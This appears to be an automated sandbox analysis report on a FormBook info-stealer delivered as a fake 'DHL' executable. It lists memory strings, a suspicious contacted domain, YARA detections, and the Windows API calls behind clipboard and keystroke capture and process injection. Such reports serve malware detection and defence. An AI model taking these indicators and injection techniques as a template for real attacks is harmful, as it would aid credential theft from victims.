            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.1723346567.000000000751C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000281B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033l
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000284E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3807603495.000000000490A000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.000000000471A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?LzY4r=mxnR
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.3812272945.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C74164
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C74164
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C73F66
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C6001C
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C8CABC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: This is a third-party compiled AutoIt script.0_2_00C03B3A
            Source: DHL 30312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 30312052024.exe, 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4013af4b-4
            Source: DHL 30312052024.exe, 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_86fb4270-d
            Source: DHL 30312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7a06a751-c
            Source: DHL 30312052024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d0e67e43-e
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03A72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E24340 NtSetContextThread,LdrInitializeThunk,4_2_02E24340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E24650 NtSuspendThread,LdrInitializeThunk,4_2_02E24650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22AF0 NtWriteFile,LdrInitializeThunk,4_2_02E22AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22AD0 NtReadFile,LdrInitializeThunk,4_2_02E22AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02E22BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02E22BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02E22BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22B60 NtClose,LdrInitializeThunk,4_2_02E22B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02E22EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02E22E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22FE0 NtCreateFile,LdrInitializeThunk,4_2_02E22FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22FB0 NtResumeThread,LdrInitializeThunk,4_2_02E22FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22F30 NtCreateSection,LdrInitializeThunk,4_2_02E22F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02E22CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22C60 NtCreateKey,LdrInitializeThunk,4_2_02E22C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02E22C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02E22DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22DD0 NtDelayExecution,LdrInitializeThunk,4_2_02E22DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02E22D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02E22D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E235C0 NtCreateMutant,LdrInitializeThunk,4_2_02E235C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E239B0 NtGetContextThread,LdrInitializeThunk,4_2_02E239B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22AB0 NtWaitForSingleObject,4_2_02E22AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22B80 NtQueryInformationFile,4_2_02E22B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22EA0 NtAdjustPrivilegesToken,4_2_02E22EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22E30 NtWriteVirtualMemory,4_2_02E22E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22FA0 NtQuerySection,4_2_02E22FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22F90 NtProtectVirtualMemory,4_2_02E22F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22F60 NtCreateProcessEx,4_2_02E22F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22CF0 NtOpenProcess,4_2_02E22CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22CC0 NtQueryVirtualMemory,4_2_02E22CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22C00 NtQueryInformationProcess,4_2_02E22C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22DB0 NtEnumerateKey,4_2_02E22DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22D00 NtSetInformationFile,4_2_02E22D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23090 NtSetValueKey,4_2_02E23090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23010 NtOpenDirectoryObject,4_2_02E23010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23D70 NtOpenThread,4_2_02E23D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23D10 NtOpenProcessToken,4_2_02E23D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00627920 NtCreateFile,4_2_00627920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00627A70 NtReadFile,4_2_00627A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00627B50 NtDeleteFile,4_2_00627B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00627BE0 NtClose,4_2_00627BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00627D30 NtAllocateVirtualMemory,4_2_00627D30
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00C6A1EF
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C58310
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C651BD
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C0E6A00_2_00C0E6A0
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2D9750_2_00C2D975
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C0FCE00_2_00C0FCE0
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C221C50_2_00C221C5
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C362D20_2_00C362D2
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C803DA0_2_00C803DA
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C3242E0_2_00C3242E
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C225FA0_2_00C225FA
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C166E10_2_00C166E1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C5E6160_2_00C5E616
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C3878F0_2_00C3878F
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C688890_2_00C68889
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C368440_2_00C36844
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C808570_2_00C80857
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C188080_2_00C18808
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2CB210_2_00C2CB21
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C36DB60_2_00C36DB6
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C16F9E0_2_00C16F9E
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C130300_2_00C13030
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2F1D90_2_00C2F1D9
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C231870_2_00C23187
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C012870_2_00C01287
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C214840_2_00C21484
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C155200_2_00C15520
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C276960_2_00C27696
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C157600_2_00C15760
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C219780_2_00C21978
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C39AB50_2_00C39AB5
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C87DDB0_2_00C87DDB
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C21D900_2_00C21D90
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C2BDA60_2_00C2BDA6
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C13FE00_2_00C13FE0
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C0DF000_2_00C0DF00
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_013ED4400_2_013ED440
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC02C02_2_03AC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF41A22_2_03AF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD20002_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
